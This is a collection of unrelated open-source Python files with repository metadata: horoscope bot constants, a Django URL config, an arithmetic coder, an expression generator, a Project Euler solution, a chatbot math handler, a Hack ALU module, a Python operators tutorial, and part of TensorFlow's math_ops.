'daily_common_url': "https://hyrax.ru/rss_daily_common_gemini.xml"
},
CANCER: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_cancer.xml"
},
LEO: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_cancer.xml"
},
VIRGO: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_virgo.xml"
},
LIBRA: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_libra.xml"
},
SCORPIO: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_scorpio.xml"
},
SAGITTARIUS: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_scorpio.xml"
},
CAPRICORN: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_capricorn.xml"
},
AQUARIOU: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_aquarius.xml"
},
PISCES: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_pisces.xml"
}
}
| {
"repo_name": "adiletmaratov/horoscope-bot",
"path": "src/horoscope_parser/constants.py",
"copies": "1",
"size": "1424",
"license": "mit",
"hash": -1855375901391460000,
"line_mean": 26.3846153846,
"line_max": 77,
"alpha_frac": 0.5941011236,
"autogenerated": false,
"ratio": 2.507042253521127,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.36011433771211265,
"avg_score": null,
"num_lines": null
} |
"""arineto_website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.conf.urls import include
from django.contrib import admin
from django.conf import settings
from django.views import static
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^blog/', include('apps.blog.urls', namespace='blog')),
url(r'^', include('apps.landing_page.urls', namespace='landing')),
]
if settings.DEBUG:
urlpatterns += [
url(
r'^media/(?P<path>.*)$', static.serve,
{'document_root': settings.MEDIA_ROOT}
)
]
| {
"repo_name": "arineto/arineto-website",
"path": "arineto_website/urls.py",
"copies": "1",
"size": "1184",
"license": "mit",
"hash": -5757070875297243000,
"line_mean": 31.8888888889,
"line_max": 79,
"alpha_frac": 0.6706081081,
"autogenerated": false,
"ratio": 3.5770392749244713,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47476473830244714,
"avg_score": null,
"num_lines": null
} |
"""Arithmetic Coding
Functions for doing compression using arithmetic coding.
http://en.wikipedia.org/wiki/Arithmetic_coding
The functions and classes all need predictive models; see model.py
"""
import math
import itertools
def grouper(n, iterable, fillvalue=None):
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def compress(model, bits):
"""Compresses a stream of bits into another stream of bits.
Requires a prediction model.
"""
encoder = BinaryArithmeticEncoder(model)
for c in itertools.chain.from_iterable((encoder.encode(b) for b in bits)):
yield c
for c in encoder.flush():
yield c
def compress_bytes(model, bytes):
"""Compresses a stream of bytes into another steam of bytes.
Requires a prediction model.
"""
bits = ((m >> i) & 1 for m in bytes for i in range(8))
cbits = compress(model, bits)
for c in (int(''.join(byte), 2) for byte in grouper(8, (str(b) for b in cbits), '0')):
yield c
def decompress(model, bits, msglen):
"""Decompresses a stream of bits into another stream of bits.
Requires the same prediction model (from its original state) that was
used for decompression and the number of bits in the message.
"""
decoder = BinaryArithmeticDecoder(model)
nbits = 0
for r in itertools.chain(*(decoder.decode(b) for b in bits)):
yield r
nbits += 1
for r in decoder.flush(msglen - nbits):
yield r
def decompress_bytes(model, bytes, msglen):
"""Decompresses a stream of bytes into another stream of bytes.
Requires the same prediction model (from its original state) that was
used for decompression and the number of bytes in the message.
"""
cbits = ((m >> i) & 1 for m in bytes for i in range(8))
bits = decompress(model, cbits, msglen * 8)
for r in (int(''.join(byte), 2) for byte in grouper(8, (str(b) for b in bits), '0')):
yield r
class BinaryArithmeticEncoder:
"""BinaryArithmeticEncoder
An arithmetic encoder for binary data sources. For the theory behind the encoder
see http://en.wikipedia.org/wiki/Arithmetic_coding.
>>> encoder = BinaryArithmeticEncoder(CTW(8))
See also: BinaryArithmeticDecoder, compress, and compress_bytes
"""
def __init__(self, model, num_bits = 32):
self.model = model
self.num_bits = num_bits
self._top = 2 ** self.num_bits
self._half = self._top // 2 # [0, self._half) is outputs the zero bit
self._1_4 = self._half // 2
self._3_4 = self._top - self._half
self.low = 0 # Interval is [self.low, self.high)
self.high = self._top
self.follow_bits = 0 # Opposing bits to follow the next output'd bit
def encode(self, symbol):
"""Encodes a symbol returning a sequence of coded bits.
The encoder is stateful and (since it is hopefully compressing the input) it will not
return output bits for each input symbol.
You will need to flush the encoder to get remaining coded bits after encoding the
complete sequence.
"""
output = []
# Find the split point
p_symbol = math.exp(self.model.update(symbol))
p_zero = p_symbol if symbol == 0 else 1 - p_symbol
split = self.low + max(1, int((self.high - self.low) * p_zero)) # 0-interval is [self.low, split)
# Update the range based on the observed symbol
if symbol:
self.low = split
else:
self.high = split
# Update the model based on the observed symbol
#self.model.update(symbol)
# If the range no longer overlaps the midpoint, the next bit is known
# also rescale the interval to get back precision
#
# If the range overlaps the midpoint but not the 1/4 or 3/4 points then
# we rescale the interval, but track this with follow bits. If the next
# bit to output is a 1, then we already know it's at the low end of the upper
# half, so we follow with a 0. Similarly if the next bit is a 0, then
# we already know it's at the high end of the lower half, so we follow
# with a 1.
# If this happens a second time before outputting any bit, then there will
# need to be 2 of these follow bits. So we track this by just incrementing
# a follow bit counter.
#
# This is in a loop because the new range may not overlap the new midpoint,
# allowing multiple bits to be determined
output = []
while True:
if self.high <= self._half:
output.append(0)
output.extend([1] * self.follow_bits) # Add the follow bits
self.follow_bits = 0
elif self.low >= self._half:
output.append(1)
output.extend([0] * self.follow_bits) # Add the follow bits
self.follow_bits = 0
self.low -= self._half
self.high -= self._half
elif self.low >= self._1_4 and self.high <= self._3_4:
self.follow_bits += 1
self.low -= self._1_4
self.high -= self._1_4
else:
break
self.low *= 2
self.high *= 2
return output
def flush(self):
"""Flushes any coded bits in the encoder. Typically called after the entire
sequence has been encoded.
"""
if self.low < self._1_4:
output = [0] + [1] * (self.follow_bits + 1)
else:
output = [1] + [0] * (self.follow_bits + 1)
return output
class BinaryArithmeticDecoder:
def __init__(self, model, num_bits = 32):
self.model = model
self.num_bits = num_bits
self._top = 2 ** self.num_bits
self._half = self._top // 2 # [0, self._half) outputs the zero bit
self._1_4 = self._half // 2
self._3_4 = self._top - self._1_4
self.low = 0
self.high = 1 # This ensures num_bits are read before decoding
self.value = 0
def decode(self, bit):
if self.low >= self._half:
self.value -= self._half
self.low -= self._half
self.high -= self._half
elif self.low >= self._1_4 and self.high <= self._3_4:
self.value -= self._1_4
self.low -= self._1_4
self.high -= self._1_4
self.low *= 2
self.high *= 2
self.value *= 2
self.value += bit
output = []
while self.low < self._half < self.high:
p_zero = self.model.predict(0)
split = self.low + int((self.high - self.low) * p_zero) # 0-interval is [self.low, split)
symbol = 0 if self.value < split else 1
output.append(symbol)
self.model.update(symbol)
if symbol:
self.low = split
else:
self.high = split
return output
def flush(self, nbits):
output = []
while len(output) < nbits:
output += self.decode(0)
return output[:nbits]
| {
"repo_name": "annakoop/forget-me-not",
"path": "ac.py",
"copies": "2",
"size": "7276",
"license": "unlicense",
"hash": -8301029140236450000,
"line_mean": 34.1497584541,
"line_max": 105,
"alpha_frac": 0.5783397471,
"autogenerated": false,
"ratio": 3.941495124593716,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5519834871693715,
"avg_score": null,
"num_lines": null
} |
"""Arithmetic expression generator.
Usage:
arithgen [options]
arithgen --help
arithgen --version
Options:
-n, --count=<count> Specify how many expressions to
generate. [default: 1]
-d, --difficulty=<difficulty> Specify the complexity of
expressions. [default: 3]
-F, --format=<format> Specify the output format.
[default: {expr} = {result}]
"""
import sys
from docopt import docopt
from arithgen import __version__
from arithgen.generator import generate
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
args = docopt(__doc__, argv=argv,
version='arithgen ' + __version__)
try:
count = int(args['--count'])
difficulty = int(args['--difficulty'])
except ValueError:
print('Invalid arguments')
return 1
for _ in range(count):
expr, result = generate(difficulty=difficulty)
print(args['--format'].format(expr=expr, result=result))
| {
"repo_name": "yyt16384/arithgen",
"path": "arithgen/cmdline.py",
"copies": "2",
"size": "1088",
"license": "mit",
"hash": -1972982082473051100,
"line_mean": 27.6315789474,
"line_max": 66,
"alpha_frac": 0.5597426471,
"autogenerated": false,
"ratio": 4.2007722007722,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 38
} |
"""Arithmetic expressions
Problem 93
By using each of the digits from the set, {1, 2, 3, 4}, exactly once, and making
use of the four arithmetic operations (+, −, *, /) and brackets/parentheses, it
is possible to form different positive integer targets.
For example,
8 = (4 * (1 + 3)) / 2
14 = 4 * (3 + 1 / 2)
19 = 4 * (2 + 3) − 1
36 = 3 * 4 * (2 + 1)
Note that concatenations of the digits, like 12 + 34, are not allowed.
Using the set, {1, 2, 3, 4}, it is possible to obtain thirty-one different
target numbers of which 36 is the maximum, and each of the numbers 1 to 28 can
be obtained before encountering the first non-expressible number.
Find the set of four distinct digits, a < b < c < d, for which the longest set
of consecutive positive integers, 1 to n, can be obtained, giving your answer
as a string: abcd.
"""
from eulerlib import generateListPermutations, timedRun
generated = {}
def getPermutations(a, b, c, d):
return generateListPermutations([a,b,c,d])
def allGroupings(m):
a, b, c, d = m
# no grouping: 1111
g0 = "{0} op1 {1} op2 {2} op3 {3}".format(a,b,c,d)
# groups of 2: 112 121 211 22
g1 = "{0} op1 {1} op2 ({2} op3 {3})".format(a,b,c,d)
g2 = "{0} op1 ({1} op2 {2}) op3 {3}".format(a,b,c,d)
g3 = "({0} op1 {1}) op2 {2} op3 {3}".format(a,b,c,d)
g4 = "({0} op1 {1}) op2 ({2} op3 {3})".format(a,b,c,d)
# groups os 3: 13 31
g5 = "{0} op1 ({1} op2 {2} op3 {3})".format(a,b,c,d)
g6 = "({0} op1 {1} op2 {2}) op3 {3}".format(a,b,c,d)
# groups of groups: 1(21) 1(12) (21)1 (12)1
g7 = "{0} op1 (({1} op2 {2}) op3 {3})".format(a,b,c,d)
g8 = "{0} op1 ({1} op2 ({2} op3 {3}))".format(a,b,c,d)
g9 = "(({0} op1 {1}) op2 {2}) op3 {3}".format(a,b,c,d)
g10 = "({0} op1 ({1} op2 {2})) op3 {3}".format(a,b,c,d)
return [g0, g1, g2, g3, g4, g5, g6, g7, g8, g9, g10]
def allOperations():
op = "+-*/"
combos = []
for i in range(64):
a = i // 16
b = i // 4 % 4
c = i % 4
combos.append((op[a], op[b], op[c]))
return combos
def applyPatterns(a, b, c, d):
ops = allOperations()
for p in getPermutations(a, b, c, d):
for g in allGroupings(p):
for o in ops:
expr = g.replace("op1", o[0]).replace("op2", o[1]).replace("op3", o[2])
try:
v = eval(expr)
iv = int(v)
# count only positive integer results
if v == iv and iv > 0:
generated[iv] = True
except ZeroDivisionError:
# don't count zero division
None
def countConsecutive():
global generated
consecutive = 1
maxConsecutive = 0
k = list(generated.keys())
prev = k[0]
for i in k:
if i == prev+1:
consecutive += 1
if consecutive > maxConsecutive:
maxConsecutive = consecutive
else:
consecutive = 1
prev = i
return maxConsecutive
def euler93():
global generated
maxConsecutive = 0
sequence = ()
for a in range(1,10):
for b in range(a+1, 10):
for c in range(b+1, 10):
for d in range(c+1, 10):
generated = {}
applyPatterns(a, b, c, d)
consecutive = countConsecutive()
print(a, b, c, d, consecutive)
if consecutive > maxConsecutive:
maxConsecutive = consecutive
sequence = (a, b, c, d)
return sequence
print("result:", timedRun(euler93))
| {
"repo_name": "feliposz/project-euler-solutions",
"path": "python/euler93.py",
"copies": "1",
"size": "3642",
"license": "mit",
"hash": 1709373575958708200,
"line_mean": 31.7747747748,
"line_max": 87,
"alpha_frac": 0.5258383727,
"autogenerated": false,
"ratio": 3.039264828738513,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4065103201438513,
"avg_score": null,
"num_lines": null
} |
"""arithmetichandler.py -- Basic math and arithmetic
Copyright 2016 Rylan Santinon
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import division
from ..response import Response
from ..handlerbase import StatementHandlerBase
from math import log, log10, sqrt, sin, cos, tan
class ArithmeticHandler(StatementHandlerBase):
"""Class for basic arithmetic responses"""
_ADD = lambda x, y: sum([x, y])
_SUBTRACT = lambda x, y: sum([x, -1*y])
_PRODUCT = lambda x, y: x*y
_DIVIDE = lambda x, y: x/y
INFIX_OPS = [('+', _ADD),
('plus', _ADD),
('-', _SUBTRACT),
('/', _DIVIDE),
('by', _DIVIDE),
('minus', _SUBTRACT),
('*', _PRODUCT),
('times', _PRODUCT)]
UNARY_OPS = [('root', sqrt),
('sqrt', sqrt),
('sin', sin),
('cos', cos),
('tan', tan),
('ln', log),
('log', log10)]
def _is_number_in(self, tokens):
"""Return true if there is a number available
>>> ArithmeticHandler()._is_number_in('5 of them'.split(' '))
True
"""
for token in tokens:
try:
return float(token) != None
except ValueError:
pass
return False
def _has_number_after(self, tokens, ix):
"""Check if number occurs after given index
>>> ArithmeticHandler()._has_number_after("give me log of 7".split(), 3)
True
>>> ArithmeticHandler()._has_number_after("what is 7 log of?".split(), 3)
False
"""
def try_parse_float(x):
try:
return float(x)
except ValueError:
return None
return any([try_parse_float(x) for x in tokens[ix:]])
def _has_infix(self, statement):
"""Return true if it is able to handle infix operation
>>> ArithmeticHandler()._has_infix("calculate 5 plus 2")
True
>>> ArithmeticHandler()._has_infix("calculate + 2 please")
False
"""
tokens = statement.split(' ')
for ix, token in enumerate(tokens):
for op, _ in ArithmeticHandler.INFIX_OPS:
if op == token:
return self._is_number_in(tokens[ix:]) and self._is_number_in(tokens[:ix])
return False
def _has_unary(self, statement):
"""Return true if unary statement can be handled
>>> ArithmeticHandler()._has_unary('what is square root of 5')
True
>>> ArithmeticHandler()._has_unary('what is square root of')
False
>>> ArithmeticHandler()._has_unary('root 64.0')
True
>>> ArithmeticHandler()._has_unary('what is 12 of 5')
False
"""
tokens = statement.split(' ')
for ix, token in enumerate(tokens):
for op, _ in ArithmeticHandler.UNARY_OPS:
if op == token:
return self._is_number_in(tokens[ix:])
return False
def _calc_unary(self, statement):
"""Return output of unary operation
>>> ArithmeticHandler()._calc_unary('what is root of 16')
4.0
>>> ArithmeticHandler()._calc_unary('calculate log 100')
2.0
>>> ArithmeticHandler()._calc_unary('you know what square root of 64 is?')
8.0
"""
tokens = statement.split(' ')
op_func = None
start_ix = 0
arg = None
for ix, token in enumerate(tokens):
for op_word, func in ArithmeticHandler.UNARY_OPS:
if op_word == token:
op_func = func
start_ix = ix
for token in tokens[start_ix:]:
try:
number = float(token)
arg = number
break
except ValueError:
pass
if op_func == None or arg == None:
raise RuntimeError("Unable to calculate unary operation: %s" % statement)
return op_func(arg)
def _calc_infix(self, statement):
"""Return output of infix operation
>>> ArithmeticHandler()._calc_infix('7 + 2')
9.0
>>> ArithmeticHandler()._calc_infix('tell me 20 minus 48')
-28.0
"""
tokens = statement.split(' ')
op_func = None
start_ix = 0
arg_a = None
arg_b = None
for ix, token in enumerate(tokens):
for op_word, func in ArithmeticHandler.INFIX_OPS:
if op_word == token:
op_func = func
start_ix = ix
for token in tokens[start_ix:]:
try:
number = float(token)
arg_b = number
break
except ValueError:
pass
for token in tokens[:start_ix]:
try:
number = float(token)
arg_a = number
break
except ValueError:
pass
if op_func == None or arg_a == None or arg_b == None:
raise RuntimeError("Unable to calculate operation: %s" % statement)
return op_func(arg_a, arg_b)
def can_handle(self, statement, memory=None):
low = statement.lower()
return self._has_infix(low) or self._has_unary(low)
def handle(self, statement, memory=None):
"""Respond to basic arithmetic request
>>> ArithmeticHandler().handle("compute 4 * -2").answer
'-8.0'
>>> ArithmeticHandler().handle("3.0 times 9.0").answer
'27.0'
>>> ArithmeticHandler().handle("What is 13 - 20").answer
'-7.0'
>>> ArithmeticHandler().handle("Calculate for me square root of 100").answer
'10.0'
"""
if self._has_unary(statement):
num = self._calc_unary(statement)
return Response(str(num), [])
elif self._has_infix(statement):
num = self._calc_infix(statement)
return Response(str(num), [])
raise RuntimeError("ArithmeticHandler reported ability to handle %s but can't" % statement)
if __name__ == '__main__':
import doctest
doctest.testmod()
| {
"repo_name": "rylans/figaro",
"path": "figaro/handlers/arithmetichandler.py",
"copies": "1",
"size": "6820",
"license": "apache-2.0",
"hash": 5487474149858438000,
"line_mean": 30.4285714286,
"line_max": 99,
"alpha_frac": 0.5304985337,
"autogenerated": false,
"ratio": 4.33015873015873,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5360657263858729,
"avg_score": null,
"num_lines": null
} |
''' Arithmetic implemented using Python builtin functions instead of logic gates '''
'''----------------------------- Imports -----------------------------'''
# Hack computer
from ._x__components import *
'''----------------------------- Helpers -----------------------------'''
largestInt_ = 2 ** ( N_BITS - 1 ) - 1 # two's complement
def isNegative_( x ):
''' 2s complement -> MSB is one if negative '''
return int( x > largestInt_ )
def trim_( x ):
''' discard overflow bits '''
return x & negativeOne_
'''------------------------- Shift Registers -------------------------'''
def shiftRight_( x, y ):
return x >> y # logical shift
def shiftLeft_( x, y ):
z = x << y
return trim( z )
'''--------------------- Arithmetic Logic Unit ---------------------'''
# MSB to LSB
def ALU_( N, x, y, fub1, fub0, zx, nx, zy, ny, f, no ):
''' N bit ALU '''
out = None
if fub1 == 1 :
if fub0 == 1 :
if zx == 1 : x = 0
if nx == 1 : x = notN_( x )
if zy == 1 : y = 0
if ny == 1 : y = notN_( y )
if f == 1 : out = trim( x + y )
elif f == 0 : out = x & y
if no == 1 : out = notN_( out )
elif fub0 == 0 :
out = x ^ y
elif fub1 == 0 :
if fub0 == 1 :
out = shiftLeft_( x, y )
elif fub0 == 0 :
out = shiftRight_( x, y )
zr = 1 if out == 0 else 0
ng = isNegative_( out )
return ( out, zr, ng )
| {
"repo_name": "JetStarBlues/Nand-2-Tetris",
"path": "OldArchitecture/v1.0/Components/_2__arithmetic_performance.py",
"copies": "2",
"size": "1374",
"license": "mit",
"hash": 20984491368448300,
"line_mean": 15.962962963,
"line_max": 84,
"alpha_frac": 0.4366812227,
"autogenerated": false,
"ratio": 2.980477223427332,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4417158446127332,
"avg_score": null,
"num_lines": null
} |
# Arithmetic:
print(10 * 'x') # xxxxxxxxxx
print(5 / 2) # 2.5
print(5 // 2) # 2
print(2 ** 8) # 256
# Indexing:
list = [1, 2, 3, 4, 5]
print(list[0]) # 1
print(list[-1]) # 5
# print(list[99]) # IndexError: list index out of range
# Slicing:
list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(list[1:4]) # [2, 3, 4]
print(list[1:]) # [2, 3, 4, 5, 6, 7, 8, 9, 10]
print(list[:3]) # [1, 2, 3]
print(list[1:7:2]) # [2, 4, 6]
print(list[::-1]) # [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
print(list[:]) # [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Logical:
a = 1
b = 2
print(a == 1 and b == 2) # True
print(1 and 2) # 2
print(0 or 2) # 2
# Assignment:
list1 = [1, 2, 3]
list2 = [4, 5]
# Beware that `list1 += list2` modifies the list in-place while `list1 = list1
# + list2` creates a new list:
print(id(list1)) # 140045417168968
list1 += list2
print(id(list1)) # 140045417168968
list1 = list1 + list2
print(id(list1)) # 140654991417864 (oops)
# For an example of the "walrus operator" :=, see 29-walrus-operator.py.
# in:
print(3 in [1, 2, 3, 4]) # True
# is:
a = [1, 2, 3]
a = b
print(a is b) # True
# Caching curiosity (unexpected behavior; run this in an interpreter):
# >>> a = 1
# >>> b = 1
# >>> a is b
# True
# >>> a = 300
# >>> b = 300
# >>> a is b
# False
#
# See http://stackoverflow.com/q/306313/2580955 and
# http://stackoverflow.com/q/15171695/2580955 for more details.
| {
"repo_name": "s3rvac/talks",
"path": "2021-03-08-Introduction-to-Python/examples/14-operations.py",
"copies": "1",
"size": "1407",
"license": "bsd-3-clause",
"hash": -5558958110940477000,
"line_mean": 22.0655737705,
"line_max": 78,
"alpha_frac": 0.5579246624,
"autogenerated": false,
"ratio": 2.236883942766296,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8273676453386931,
"avg_score": 0.0042264303558729064,
"num_lines": 61
} |
"""## Arithmetic Operators
TensorFlow provides several operations that you can use to add basic arithmetic
operators to your graph.
@@add
@@sub
@@mul
@@div
@@mod
## Basic Math Functions
TensorFlow provides several operations that you can use to add basic
mathematical functions to your graph.
@@add_n
@@abs
@@neg
@@sign
@@inv
@@square
@@round
@@sqrt
@@rsqrt
@@pow
@@exp
@@log
@@ceil
@@floor
@@maximum
@@minimum
@@cos
@@sin
## Matrix Math Functions
TensorFlow provides several operations that you can use to add basic
mathematical functions for matrices to your graph.
@@diag
@@transpose
@@matmul
@@batch_matmul
@@matrix_determinant
@@batch_matrix_determinant
@@matrix_inverse
@@batch_matrix_inverse
@@cholesky
@@batch_cholesky
## Complex Number Functions
TensorFlow provides several operations that you can use to add complex number
functions to your graph.
@@complex
@@complex_abs
@@conj
@@imag
@@real
## Reduction
TensorFlow provides several operations that you can use to perform
common math computations that reduce various dimensions of a tensor.
@@reduce_sum
@@reduce_prod
@@reduce_min
@@reduce_max
@@reduce_mean
@@reduce_all
@@reduce_any
@@accumulate_n
## Segmentation
TensorFlow provides several operations that you can use to perform common
math computations on tensor segments.
Here a segmentation is a partitioning of a tensor along
the first dimension, i.e. it defines a mapping from the first dimension onto
`segment_ids`. The `segment_ids` tensor should be the size of
the first dimension, `d0`, with consecutive IDs in the range `0` to `k`,
where `k<d0`.
In particular, a segmentation of a matrix tensor is a mapping of rows to
segments.
For example:
```python
c = tf.constant([[1,2,3,4], [-1,-2,-3,-4], [5,6,7,8]])
tf.segment_sum(c, tf.constant([0, 0, 1]))
==> [[0 0 0 0]
[5 6 7 8]]
```
@@segment_sum
@@segment_prod
@@segment_min
@@segment_max
@@segment_mean
@@unsorted_segment_sum
@@sparse_segment_sum
@@sparse_segment_mean
## Sequence Comparison and Indexing
TensorFlow provides several operations that you can use to add sequence
comparison and index extraction to your graph. You can use these operations to
determine sequence differences and determine the indexes of specific values in
a tensor.
@@argmin
@@argmax
@@listdiff
@@where
@@unique
@@edit_distance
@@invert_permutation
"""
import itertools
import tensorflow.python.platform
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import types
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import common_shapes
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import gen_state_ops
# pylint: disable=wildcard-import,undefined-variable
from tensorflow.python.ops.gen_math_ops import *
# Aliases for some automatically-generated names.
argmax = gen_math_ops.arg_max
argmin = gen_math_ops.arg_min
linspace = gen_math_ops.lin_space
# pylint: disable=anomalous-backslash-in-string,protected-access
def abs(x, name=None):
"""Computes the absolute value of a tensor.
Given a tensor of real numbers `x`, this operation returns a tensor
containing the absolute value of each element in `x`. For example, if x is
an input element and y is an output element, this operation computes
\\\\(y = |x|\\\\).
See [`tf.complex_abs()`](#tf_complex_abs) to compute the absolute value of a complex
number.
Args:
x: A `Tensor` of type `float`, `double`, `int32`, or `int64`.
name: A name for the operation (optional).
Returns:
A `Tensor` the same size and type as `x` with absolute values.
"""
with ops.op_scope([x], name, "Abs") as name:
x = ops.convert_to_tensor(x, name="x")
if x.dtype == types.complex64:
return gen_math_ops.complex_abs(x, name=name)
return gen_math_ops._abs(x, name=name)
def pow(x, y, name=None):
"""Computes the power of one value to another.
Given a tensor `x` and a tensor `y`, this operation computes \\\\(x^y\\\\) for
corresponding elements in `x` and `y`. For example:
```
# tensor 'x' is [[2, 2]], [3, 3]]
# tensor 'y' is [[8, 16], [2, 3]]
tf.pow(x, y) ==> [[256, 65536], [9, 27]]
```
Args:
x: A `Tensor` of type `float`, `double`, `int32`, `complex64`, or `int64`.
y: A `Tensor` of type `float`, `double`, `int32`, `complex64`, or `int64`.
name: A name for the operation (optional).
Returns:
A `Tensor`.
"""
with ops.op_scope([x], name, "Pow") as name:
return gen_math_ops._pow(x, y, name=name)
def complex(real, imag, name=None):
"""Converts two real numbers to a complex number.
Given a tensor `real` representing the real part of a complex number, and a
tensor `imag` representing the imaginary part of a complex number, this
operation computes complex numbers elementwise of the form \\\\(a + bj\\\\),
where *a* represents the `real` part and *b* represents the `imag` part.
The input tensors `real` and `imag` must be the same shape.
For example:
```
# tensor 'real' is [2.25, 3.25]
# tensor `imag` is [4.75, 5.75]
tf.complex(real, imag) ==> [[2.25 + 4.74j], [3.25 + 5.75j]]
```
Args:
real: A `Tensor` of type `float`.
imag: A `Tensor` of type `float`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
with ops.op_scope([real, imag], name, "Complex") as name:
return gen_math_ops._complex(real, imag, name=name)
def round(x, name=None):
"""Rounds the values of a tensor to the nearest integer, element-wise.
For example:
```python
# 'a' is [0.9, 2.5, 2.3, -4.4]
tf.round(a) ==> [ 1.0, 3.0, 2.0, -4.0 ]
```
Args:
x: A `Tensor` of type `float` or `double`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as `x`.
"""
x = ops.convert_to_tensor(x, name="x")
if x.dtype.is_integer:
return x
else:
return floor(x + 0.5, name=name)
def cast(x, dtype, name=None):
"""Casts a tensor to a new type.
The operation casts `x` (in case of `Tensor`) or `x.values`
(in case of `SparseTensor`) to `dtype`.
For example:
```python
# tensor `a` is [1.8, 2.2], dtype=tf.float
tf.cast(a, tf.int32) ==> [1, 2] # dtype=tf.int32
```
Args:
x: A `Tensor` or `SparseTensor`.
dtype: The destination type.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x`.
Raises:
TypeError: If `x` cannot be cast to the `dtype`.
"""
with ops.op_scope([x], name, "Cast") as name:
if isinstance(x, ops.SparseTensor):
values_cast = cast(x.values, dtype, name=name)
return ops.SparseTensor(x.indices, values_cast, x.shape)
else:
# TODO(touts): Handle what Josh said.
#
# Could return ops.convert_to_tensor(x, dtype=dtype, ...) here, but that
# allows some conversions that cast() can't do, e.g. casting numbers to
# strings.
x = ops.convert_to_tensor(x, name="x")
if x.dtype.base_dtype == dtype:
return x
return gen_math_ops.cast(x, dtype, name=name)
def to_float(x, name="ToFloat"):
"""Casts a tensor to type `float32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float32`.
Raises:
TypeError: If `x` cannot be cast to the `float32`.
"""
return cast(x, types.float32, name=name)
def to_double(x, name="ToDouble"):
"""Casts a tensor to type `float64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float64`.
Raises:
TypeError: If `x` cannot be cast to the `float64`.
"""
return cast(x, types.float64, name=name)
def to_int32(x, name="ToInt32"):
"""Casts a tensor to type `int32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int32`.
Raises:
TypeError: If `x` cannot be cast to the `int32`.
"""
return cast(x, types.int32, name=name)
def to_int64(x, name="ToInt64"):
"""Casts a tensor to type `int64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int64`.
Raises:
TypeError: If `x` cannot be cast to the `int64`.
"""
return cast(x, types.int64, name=name)
def to_bfloat16(x, name="ToBFloat16"):
"""Casts a tensor to type `bfloat16`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `bfloat16`.
Raises:
TypeError: If `x` cannot be cast to the `bfloat16`.
"""
return cast(x, types.bfloat16, name=name)
ops.Tensor._override_operator("__neg__", neg)
ops.Tensor._override_operator("__abs__", abs)
# __invert__ corresponds to the ~ operator. Here we follow the numpy convention
# ~ marks an elementwise bit-wise inverse. This is only implemented for boolean
# tensors and will throw a TypeError if used on nonboolean arrays
ops.Tensor._override_operator("__invert__", logical_not)
def _OverrideBinaryOperatorHelper(func, op_name):
"""Register operators with different tensor and scalar versions.
Args:
func: the operator
op_name: name of the operator being overridden
"""
def binary_op_wrapper(x, y):
with ops.op_scope([x, y], None, op_name) as name:
assert isinstance(x, ops.Tensor)
y = ops.convert_to_tensor(y, dtype=x.dtype.base_dtype, name="y")
return func(x, y, name=name)
ops.Tensor._override_operator("__%s__" % op_name, binary_op_wrapper)
del binary_op_wrapper
def r_binary_op_wrapper(y, x):
with ops.op_scope([x, y], None, op_name) as name:
assert isinstance(y, ops.Tensor)
x = ops.convert_to_tensor(x, dtype=y.dtype.base_dtype, name="x")
return func(x, y, name=name)
ops.Tensor._override_operator("__r%s__" % op_name, r_binary_op_wrapper)
